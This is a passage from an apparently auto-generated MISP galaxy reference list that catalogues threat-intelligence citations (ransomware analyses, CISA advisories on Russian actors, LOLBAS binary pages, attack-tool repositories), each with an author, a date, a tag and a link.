The tag is: misp-galaxy:references="Trend Micro Royal Linux ESXi February 2023"

Table 15225. Table References

Links

https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html

Cybereason Royal December 2022

Cybereason Global SOC and Cybereason Security Research Teams. (2022, December 14). Royal Rumble: Analysis of Royal Ransomware. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="Cybereason Royal December 2022"

Table 15226. Table References

Links

https://www.cybereason.com/blog/royal-ransomware-analysis

Rpcping.exe - LOLBAS Project

LOLBAS. (2018, May 25). Rpcping.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Rpcping.exe - LOLBAS Project"

Table 15227. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Rpcping/

Threatpost New Op Sharpshooter Data March 2019

O’Donnell. (2019, March 3). RSAC 2019: New Operation Sharpshooter Data Reveals Higher Complexity, Scope. Retrieved September 26, 2022.

The tag is: misp-galaxy:references="Threatpost New Op Sharpshooter Data March 2019"

Table 15228. Table References

Links

https://threatpost.com/sharpshooter-complexity-scope/142359/

GCN RSA June 2011

Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved September 24, 2018.

The tag is: misp-galaxy:references="GCN RSA June 2011"

Table 15229. Table References

Links

https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/

RSA Shell Crew

RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="RSA Shell Crew"

Table 15230. Table References

Links

https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf

GitHub Rubeus March 2023

Harmj0y. (n.d.). Rubeus. Retrieved March 29, 2023.

The tag is: misp-galaxy:references="GitHub Rubeus March 2023"

Table 15231. Table References

Links

https://github.com/GhostPack/Rubeus

SOCPrime DoubleExtension

Eugene Tkachenko. (2020, May 1). Rule of the Week: Possible Malicious File Double Extension. Retrieved July 27, 2021.

The tag is: misp-galaxy:references="SOCPrime DoubleExtension"

Table 15232. Table References

Links

https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/

SensePost Ruler GitHub

SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019.

The tag is: misp-galaxy:references="SensePost Ruler GitHub"

Table 15233. Table References

Links

https://github.com/sensepost/ruler

Microsoft Cloud App Security

Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.

The tag is: misp-galaxy:references="Microsoft Cloud App Security"

Table 15234. Table References

Links

https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154

Microsoft Run Key

Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Microsoft Run Key"

Table 15235. Table References

Links

http://msdn.microsoft.com/en-us/library/aa376977

Microsoft RunAs

Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.

The tag is: misp-galaxy:references="Microsoft RunAs"

Table 15236. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)

Microsoft runas

Microsoft TechNet. (n.d.). Runas. Retrieved April 21, 2017.

The tag is: misp-galaxy:references="Microsoft runas"

Table 15237. Table References

Links

https://technet.microsoft.com/en-us/library/bb490994.aspx

Wikipedia Run Command

Wikipedia. (2018, August 3). Run Command. Retrieved October 12, 2018.

The tag is: misp-galaxy:references="Wikipedia Run Command"

Table 15238. Table References

Links

https://en.wikipedia.org/wiki/Run_command

Secpod Winexe June 2017

Prakash, T. (2017, June 21). Run commands on Windows system remotely using Winexe. Retrieved January 22, 2018.

The tag is: misp-galaxy:references="Secpod Winexe June 2017"

Table 15239. Table References

Links

http://www.secpod.com/blog/winexe/

Rundll32.exe - LOLBAS Project

LOLBAS. (2018, May 25). Rundll32.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Rundll32.exe - LOLBAS Project"

Table 15240. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Rundll32/

Attackify Rundll32.exe Obscurity

Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.

The tag is: misp-galaxy:references="Attackify Rundll32.exe Obscurity"

Table 15241. Table References

Links

https://www.attackify.com/blog/rundll32_execution_order/

Runexehelper.exe - LOLBAS Project

LOLBAS. (2022, December 13). Runexehelper.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Runexehelper.exe - LOLBAS Project"

Table 15242. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/

ELC Running at startup

hoakley. (2018, May 22). Running at startup: when to use a Login Item or a LaunchAgent/LaunchDaemon. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="ELC Running at startup"

Table 15243. Table References

Links

https://eclecticlight.co/2018/05/22/running-at-startup-when-to-use-a-login-item-or-a-launchagent-launchdaemon/

Powershell Remote Commands

Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="Powershell Remote Commands"

Table 15244. Table References

Links

https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1

Runonce.exe - LOLBAS Project

LOLBAS. (2018, May 25). Runonce.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Runonce.exe - LOLBAS Project"

Table 15245. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Runonce/

Apple Developer Doco Archive Run-Path

Apple Inc. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Apple Developer Doco Archive Run-Path"

Table 15246. Table References

Links

https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html

Runscripthelper.exe - LOLBAS Project

LOLBAS. (2018, May 25). Runscripthelper.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Runscripthelper.exe - LOLBAS Project"

Table 15247. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/

Microsoft Run Command

Microsoft. (2023, March 10). Run scripts in your VM by using Run Command. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="Microsoft Run Command"

Table 15248. Table References

Links

https://learn.microsoft.com/en-us/azure/virtual-machines/run-command-overview

McAfee APT28 DDE2 Nov 2017

Paganini, P. (2017, November 9). Russia-Linked APT28 group observed using DDE attack to deliver malware. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="McAfee APT28 DDE2 Nov 2017"

Table 15249. Table References

Links

http://securityaffairs.co/wordpress/65318/hacking/dde-attack-apt28.html

Security Affairs DustSquad Oct 2018

Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="Security Affairs DustSquad Oct 2018"

Table 15250. Table References

Links

https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html

SecurityWeek Nomadic Octopus Oct 2018

Kovacs, E. (2018, October 18). Russia-Linked Hackers Target Diplomatic Entities in Central Asia. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="SecurityWeek Nomadic Octopus Oct 2018"

Table 15251. Table References

Links

https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia

U.S. Federal Bureau of Investigation 2 27 2024

U.S. Federal Bureau of Investigation. (2024, February 27). Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations. Retrieved February 28, 2024.

The tag is: misp-galaxy:references="U.S. Federal Bureau of Investigation 2 27 2024"

Table 15252. Table References

Links

https://www.ic3.gov/Media/News/2024/240227.pdf

U.S. CISA SVR TeamCity Exploits December 2023

Cybersecurity and Infrastructure Security Agency. (2023, December 13). Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally. Retrieved December 14, 2023.

The tag is: misp-galaxy:references="U.S. CISA SVR TeamCity Exploits December 2023"

Table 15253. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

U.S. CISA Star Blizzard December 2023

Cybersecurity and Infrastructure Security Agency. (2023, December 7). Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns. Retrieved December 14, 2023.

The tag is: misp-galaxy:references="U.S. CISA Star Blizzard December 2023"

Table 15254. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-341a

NSA/FBI Drovorub August 2020

NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.

The tag is: misp-galaxy:references="NSA/FBI Drovorub August 2020"

Table 15255. Table References

Links

https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF

Cybersecurity Advisory GRU Brute Force Campaign July 2021

NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="Cybersecurity Advisory GRU Brute Force Campaign July 2021"

Table 15256. Table References

Links

https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF

BleepingComputer Ebury March 2017

Cimpanu, C. (2017, March 29). Russian Hacker Pleads Guilty for Role in Infamous Linux Ebury Malware. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="BleepingComputer Ebury March 2017"

Table 15257. Table References

Links

https://www.bleepingcomputer.com/news/security/russian-hacker-pleads-guilty-for-role-in-infamous-linux-ebury-malware/

Russian 2FA Push Annoyance - Cimpanu

Catalin Cimpanu. (2021, December 9). Russian hackers bypass 2FA by annoying victims with repeated push notifications. Retrieved March 31, 2022.

The tag is: misp-galaxy:references="Russian 2FA Push Annoyance - Cimpanu"

Table 15258. Table References

Links

https://therecord.media/russian-hackers-bypass-2fa-by-annoying-victims-with-repeated-push-notifications/

Unit42 Redaman January 2019

Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.

The tag is: misp-galaxy:references="Unit42 Redaman January 2019"

Table 15259. Table References

Links

https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/

CISA MFA PrintNightmare

Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved March 16, 2022.

The tag is: misp-galaxy:references="CISA MFA PrintNightmare"

Table 15260. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-074a

Russians Exploit Default MFA Protocol - CISA March 2022

Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved May 31, 2022.

The tag is: misp-galaxy:references="Russians Exploit Default MFA Protocol - CISA March 2022"

Table 15261. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-074a

alert_TA18_106A

CISA. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved February 14, 2022.

The tag is: misp-galaxy:references="alert_TA18_106A"

Table 15262. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/TA18-106A

US-CERT TA18-106A Network Infrastructure Devices 2018

US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="US-CERT TA18-106A Network Infrastructure Devices 2018"

Table 15263. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/TA18-106A

UK GOV FSB Factsheet April 2022

UK Gov. (2022, April 5). Russia’s FSB malign activity: factsheet. Retrieved April 5, 2022.

The tag is: misp-galaxy:references="UK GOV FSB Factsheet April 2022"

Table 15264. Table References

Links

https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet

Unit 42 Gamaredon February 2022

Unit 42. (2022, February 3). Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.

The tag is: misp-galaxy:references="Unit 42 Gamaredon February 2022"

Table 15265. Table References

Links

https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/

Wired Russia Cyberwar

Greenberg, A. (2022, November 10). Russia’s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless. Retrieved March 22, 2023.

The tag is: misp-galaxy:references="Wired Russia Cyberwar"

Table 15266. Table References

Links

https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/

RyanW3stman Tweet October 10 2023

RyanW3stman. (2023, October 10). RyanW3stman Tweet October 10 2023. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="RyanW3stman Tweet October 10 2023"

Table 15267. Table References

Links

https://twitter.com/RyanW3stman/status/1711732225996165135

DFIR Ryuk in 5 Hours October 2020

The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="DFIR Ryuk in 5 Hours October 2020"

Table 15268. Table References

Links

https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/

ANSSI RYUK RANSOMWARE

ANSSI. (2021, February 25). RYUK RANSOMWARE. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="ANSSI RYUK RANSOMWARE"

Table 15269. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

Bleeping Computer - Ryuk WoL

Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.

The tag is: misp-galaxy:references="Bleeping Computer - Ryuk WoL"

Table 15270. Table References

Links

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/

DFIR Ryuk 2 Hour Speed Run November 2020

The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.

The tag is: misp-galaxy:references="DFIR Ryuk 2 Hour Speed Run November 2020"

Table 15271. Table References

Links

https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

DFIR Ryuk’s Return October 2020

The DFIR Report. (2020, October 8). Ryuk’s Return. Retrieved October 9, 2020.

The tag is: misp-galaxy:references="DFIR Ryuk’s Return October 2020"

Table 15272. Table References

Links

https://thedfirreport.com/2020/10/08/ryuks-return/

Rhino S3 Ransomware Part 1

Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="Rhino S3 Ransomware Part 1"

Table 15273. Table References

Links

https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/

Rhino S3 Ransomware Part 2

Gietzen, S. (n.d.). S3 Ransomware Part 2: Prevention and Defense. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="Rhino S3 Ransomware Part 2"

Table 15274. Table References

Links

https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/

S3Recon GitHub

Travis Clarke. (2020, March 21). S3Recon GitHub. Retrieved March 4, 2022.

The tag is: misp-galaxy:references="S3Recon GitHub"

Table 15275. Table References

Links

https://github.com/clarketm/s3recon

Dell Sakula

Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.

The tag is: misp-galaxy:references="Dell Sakula"

Table 15276. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-family/

Wine API samlib.dll

Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Wine API samlib.dll"

Table 15277. Table References

Links

https://source.winehq.org/WineAPI/samlib.html

Sophos SamSam Apr 2018

Palotay, D. and Mackenzie, P. (2018, April). SamSam Ransomware Chooses Its Targets Carefully. Retrieved April 15, 2019.

The tag is: misp-galaxy:references="Sophos SamSam Apr 2018"

Table 15278. Table References

Links

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-ransomware-chooses-Its-targets-carefully-wpna.pdf

Symantec SamSam Oct 2018

Symantec Security Response Attack Investigation Team. (2018, October 30). SamSam: Targeted Ransomware Attacks Continue. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="Symantec SamSam Oct 2018"

Table 15279. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/samsam-targeted-ransomware-attacks

Talos SamSam Jan 2018

Ventura, V. (2018, January 22). SamSam - The Evolution Continues Netting Over $325,000 in 4 Weeks. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="Talos SamSam Jan 2018"

Table 15280. Table References

Links

https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html

ANSSI Sandworm January 2021

ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="ANSSI Sandworm January 2021"

Table 15281. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf

iSIGHT Sandworm 2014

Hultquist, J. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.

The tag is: misp-galaxy:references="iSIGHT Sandworm 2014"

Table 15282. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html

DOJ - Cisco Insider

DOJ. (2020, August 26). San Jose Man Pleads Guilty To Damaging Cisco’s Network. Retrieved December 15, 2020.

The tag is: misp-galaxy:references="DOJ - Cisco Insider"

Table 15283. Table References

Links

https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network

ATT ScanBox

Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="ATT ScanBox"

Table 15284. Table References

Links

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

Mandiant SCANdalous Jul 2020

Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Mandiant SCANdalous Jul 2020"

Table 15285. Table References

Links

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

Securelist ScarCruft May 2019

GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="Securelist ScarCruft May 2019"

Table 15286. Table References

Links

https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

Sysdig ScarletEel 2.0

SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. (2023, July 11). SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. Retrieved July 12, 2023.

The tag is: misp-galaxy:references="Sysdig ScarletEel 2.0"

Table 15287. Table References

Links

https://sysdig.com/blog/scarleteel-2-0/

Sysdig ScarletEel 2.0 2023

Alessandro Brucato. (2023, July 11). SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. Retrieved September 25, 2023.

The tag is: misp-galaxy:references="Sysdig ScarletEel 2.0 2023"

Table 15288. Table References

Links

https://sysdig.com/blog/scarleteel-2-0/

Scarlet Mimic Jan 2016

Falcone, R. and Miller-Osborn, J. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.

The tag is: misp-galaxy:references="Scarlet Mimic Jan 2016"

Table 15289. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

CrowdStrike Scattered Spider Profile

CrowdStrike. (n.d.). Scattered Spider. Retrieved July 5, 2023.

The tag is: misp-galaxy:references="CrowdStrike Scattered Spider Profile"

Table 15290. Table References

Links

https://www.crowdstrike.com/adversaries/scattered-spider/

U.S. CISA Scattered Spider November 16 2023

Cybersecurity and Infrastructure Security Agency. (2023, November 16). Scattered Spider. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="U.S. CISA Scattered Spider November 16 2023"

Table 15291. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a

CrowdStrike Scattered Spider BYOVD January 2023

CrowdStrike. (2023, January 10). SCATTERED SPIDER Exploits Windows Security Deficiencies with Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security. Retrieved July 5, 2023.

The tag is: misp-galaxy:references="CrowdStrike Scattered Spider BYOVD January 2023"

Table 15292. Table References

Links

https://www.crowdstrike.com/blog/scattered-spider-attempts-to-avoid-detection-with-bring-your-own-vulnerable-driver-tactic/

Sc.exe - LOLBAS Project

LOLBAS. (2018, May 25). Sc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Sc.exe - LOLBAS Project"

Table 15293. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Sc/

TechNet Forum Scheduled Task Operational Setting

Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="TechNet Forum Scheduled Task Operational Setting"

Table 15294. Table References

Links

https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen

Kifarunix - Task Scheduling in Linux

Koromicha. (2019, September 7). Scheduling tasks using at command in Linux. Retrieved December 3, 2019.

The tag is: misp-galaxy:references="Kifarunix - Task Scheduling in Linux"

Table 15295. Table References

Links

https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/

TechNet Schtasks

Microsoft. (n.d.). Schtasks. Retrieved April 28, 2016.

The tag is: misp-galaxy:references="TechNet Schtasks"

Table 15296. Table References

Links

https://technet.microsoft.com/en-us/library/bb490996.aspx

Schtasks.exe - LOLBAS Project

LOLBAS. (2018, May 25). Schtasks.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Schtasks.exe - LOLBAS Project"

Table 15297. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Schtasks/

Wikipedia Screensaver

Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017.

The tag is: misp-galaxy:references="Wikipedia Screensaver"

Table 15298. Table References

Links

https://en.wikipedia.org/wiki/Screensaver

CobaltStrike Scripted Web Delivery

Strategic Cyber, LLC. (n.d.). Scripted Web Delivery. Retrieved January 23, 2018.

The tag is: misp-galaxy:references="CobaltStrike Scripted Web Delivery"

Table 15299. Table References

Links

https://www.cobaltstrike.com/help-scripted-web-delivery

Cobalt Strike DCOM Jan 2017

Mudge, R. (2017, January 24). Scripting Matt Nelson’s MMC20.Application Lateral Movement Technique. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Cobalt Strike DCOM Jan 2017"

Table 15300. Table References

Links

https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/

Scriptrunner.exe - LOLBAS Project

LOLBAS. (2018, May 25). Scriptrunner.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Scriptrunner.exe - LOLBAS Project"

Table 15301. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/

Scrobj.dll - LOLBAS Project

LOLBAS. (2021, January 7). Scrobj.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Scrobj.dll - LOLBAS Project"

Table 15302. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Scrobj/

Microsoft SDelete July 2016

Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.

The tag is: misp-galaxy:references="Microsoft SDelete July 2016"

Table 15303. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete

Sean Metcalf Twitter DNS Records

Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Sean Metcalf Twitter DNS Records"

Table 15304. Table References

Links

https://twitter.com/PyroTek3/status/1126487227712921600/photo/1

AWS CloudTrail Search

Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020.

The tag is: misp-galaxy:references="AWS CloudTrail Search"

Table 15305. Table References

Links

https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/

Group IB Cobalt Aug 2017

Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.

The tag is: misp-galaxy:references="Group IB Cobalt Aug 2017"

Table 15306. Table References

Links

https://www.group-ib.com/blog/cobalt

GitHub SHB Credential Guard

NSA IAD. (2017, April 20). Secure Host Baseline - Credential Guard. Retrieved April 25, 2017.

The tag is: misp-galaxy:references="GitHub SHB Credential Guard"

Table 15307. Table References

Links

https://github.com/iadgov/Secure-Host-Baseline/tree/master/Credential%20Guard

Secure Host Baseline EMET

National Security Agency. (2016, May 4). Secure Host Baseline EMET. Retrieved June 22, 2016.

The tag is: misp-galaxy:references="Secure Host Baseline EMET"

Table 15308. Table References

Links

https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET

TechNet Secure Boot Process

Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.

The tag is: misp-galaxy:references="TechNet Secure Boot Process"

Table 15309. Table References

Links

https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process

SecureWorks August 2019

SecureWorks. (2019, August 27). LYCEUM Takes Center Stage in Middle East Campaign. Retrieved November 19, 2019.

The tag is: misp-galaxy:references="SecureWorks August 2019"

Table 15310. Table References

Links

https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

Securing bash history

Mathew Branwell. (2012, March 21). Securing .bash_history file. Retrieved July 8, 2017.

The tag is: misp-galaxy:references="Securing bash history"

Table 15311. Table References

Links

http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory

Microsoft Securing Privileged Access

Plett, C., Poggemeyer, L. (2012, October 26). Securing Privileged Access Reference Material. Retrieved April 25, 2017.

The tag is: misp-galaxy:references="Microsoft Securing Privileged Access"

Table 15312. Table References

Links

https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach

Berkley Secure

Berkeley Security, University of California. (n.d.). Securing Remote Desktop for System Administrators. Retrieved November 4, 2014.

The tag is: misp-galaxy:references="Berkley Secure"

Table 15313. Table References

Links

https://security.berkeley.edu/node/94

Cisco Securing SNMP

Cisco. (2006, May 10). Securing Simple Network Management Protocol. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Cisco Securing SNMP"

Table 15314. Table References

Links

https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/20370-snmpsecurity-20370.html

ADSecurity Windows Secure Baseline

Metcalf, S. (2016, October 21). Securing Windows Workstations: Developing a Secure Baseline. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="ADSecurity Windows Secure Baseline"

Table 15315. Table References

Links

https://adsecurity.org/?p=3299

Morphisec ShellTea June 2019

Gorelik, M. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.

The tag is: misp-galaxy:references="Morphisec ShellTea June 2019"

Table 15316. Table References

Links

http://blog.morphisec.com/security-alert-fin8-is-back

Carbon Black Obfuscation Sept 2016

Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="Carbon Black Obfuscation Sept 2016"

Table 15317. Table References

Links

https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/

Havana authentication bug

Jay Pipes. (2013, December 23). Security Breach! Tenant A is seeing the VNC Consoles of Tenant B! Retrieved October 6, 2021.

The tag is: misp-galaxy:references="Havana authentication bug"

Table 15318. Table References

Links

http://lists.openstack.org/pipermail/openstack/2013-December/004138.html

Microsoft Trust Considerations Nov 2014

Microsoft. (2014, November 19). Security Considerations for Trusts. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft Trust Considerations Nov 2014"

Table 15319. Table References

Links

https://technet.microsoft.com/library/cc755321.aspx

AWS Sec Groups VPC

Amazon. (n.d.). Security groups for your VPC. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="AWS Sec Groups VPC"

Table 15320. Table References

Links

https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html

Microsoft SID

Microsoft. (n.d.). Security Identifiers. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft SID"

Table 15321. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx

Schneider Electric USB Malware

Schneider Electric. (2018, August 24). Security Notification – USB Removable Media Provided With Conext Combox and Conext Battery Monitor. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Schneider Electric USB Malware"

Table 15322. Table References

Links

https://www.se.com/ww/en/download/document/SESN-2018-236-01/

Microsoft Security Subsystem

Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft Security Subsystem"

Table 15323. Table References

Links

https://technet.microsoft.com/library/cc961760.aspx

CISA IDN ST05-016

CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="CISA IDN ST05-016"

Table 15324. Table References

Links

https://us-cert.cisa.gov/ncas/tips/ST05-016

AADInternals zure AD Federated Domain

